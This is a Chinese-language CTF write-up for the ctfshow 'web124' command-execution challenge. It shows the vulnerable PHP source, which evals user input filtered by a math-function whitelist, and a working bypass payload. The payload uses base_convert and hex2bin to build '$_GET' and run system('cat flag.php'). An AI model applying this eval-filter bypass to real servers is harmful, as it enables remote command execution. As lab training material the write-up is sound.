目录

  • 源码
  • 思路
  • 题解
  • 总结

源码

<?php/*
# -*- coding: utf-8 -*-
# @Author: 收集自网络
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-06 14:04:45*/error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){show_source(__FILE__);
}else{//例子 c=20-1$content = $_GET['c'];if (strlen($content) >= 80) {die("太长了不会算");}$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];foreach ($blacklist as $blackitem) {if (preg_match('/' . $blackitem . '/m', $content)) {die("请不要输入奇奇怪怪的字符");}}//常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  foreach ($used_funcs[0] as $func) {if (!in_array($func, $whitelist)) {die("请不要输入奇奇怪怪的函数");}}//帮你算出答案eval('echo '.$content.';');
}

思路

讲下主要函数

base_convert         #在任意进制之间转换数字。
hexdec           #把十六进制转换为十进制。
dechex          #把十进制转换为十六进制。
hex2bin         #把十六进制的字符串转换为ASCII码

构造$_GET 把参数逃逸出去

转成10进制 多转一层绕过过滤

<?php // 把 hex2bin转化为10进制
echo base_convert("hex2bin", 36, 16);   //37907361743
echo "<br>";
echo base_convert("8d3746fcf", 16, 36);  //hex2bin
echo "<br>";
//把_GET 先转为16进制再转为10进制
echo hexdec(bin2hex("_GET"));  //1598506324
echo "<br>";
echo base_convert("8d3746fcf", 16, 36)(dechex("1598506324"));  // 绕过过滤拿到 "_GET"
?>

题解

c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos})&abs=system&acos=cat%20flag.php
$$pi{abs}($$pi{acos})  #相当于 $_GET['abs']($_GET['acos'])

总结

水题

CTFshow 命令执行 web124相关推荐

  1. CTFshow——命令执行

    CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...

  2. ctfshow 命令执行 web29-web77 web118-122 web124 wp

    南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...

  3. CTFshow 命令执行 web72

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

  4. [CTFSHOW]命令执行

    文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...

  5. CTFshow命令执行29-123

    命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...

  6. ctfshow命令执行篇

    web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...

  7. [CTFSHOW]命令执行55-74

    web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...

  8. ctfshow命令执行(持续更新,已更至web39)

    做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...

  9. CTFshow 命令执行 web56

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

最新文章

  1. pandas使用to_dict方法把datafraem保存为字典形式
  2. 全球公有云巨头:亚马逊 AWS
  3. 附加没有日志文件的数据库方法
  4. 微信小程序服务器开小差了,微信小程序wx.request请求封装
  5. GDCM:gdcm::Module的测试程序
  6. MySQL Workbench的使用教程 (初级入门版)
  7. BLE CC2541 串口BootLoader 即 SBL BootLoader 资料 收集
  8. saxbuilder用法(转)
  9. 【CodeForces - 357C 】Knight Tournament(并查集 或 STLset)
  10. 简述python的安装过程_python3+ selenium3开发环境搭建-手把手教你安装python(详细)...
  11. Python 协程gevent
  12. 为什么你设计的网页没有品质感?
  13. 剑指offer面试题[14]-调整数组顺序使奇数位于偶数前面
  14. 数据库树形结构,EasyUI Tree 树
  15. 看mysql手册中模式(SQL_MODE)学到的知识
  16. 西门子模块选择pdf_西门子S120变频器编码器模块的选择和配置
  17. ios 按钮下面加下划线_iOS 给部分文字加下划线四种方法
  18. 利用jink的驱动软件j-flash 合并两个hex的方法,bootloader+app -(转载)
  19. 远程监控 java,远程监控Java应用
  20. 如何利用线性回归来建立收入预测模型?

热门文章

  1. iOS imageNamed 的缓存问题
  2. 记ThoughtWorks面试失败之旅
  3. 2008_12_24_星期三
  4. AMD CPU 看清楚
  5. linux驱动——cmdline原理及利用
  6. 华为手机双卡有android,华为Mate 40系列手机入网:双卡5G+安卓系统
  7. python中字符串编码转换
  8. 可能是全网把 ZooKeeper 概念讲的最清楚的一篇文章
  9. Dos 改动IP 地址
  10. (转)SpringMVC学习(三)——SpringMVC的配置文件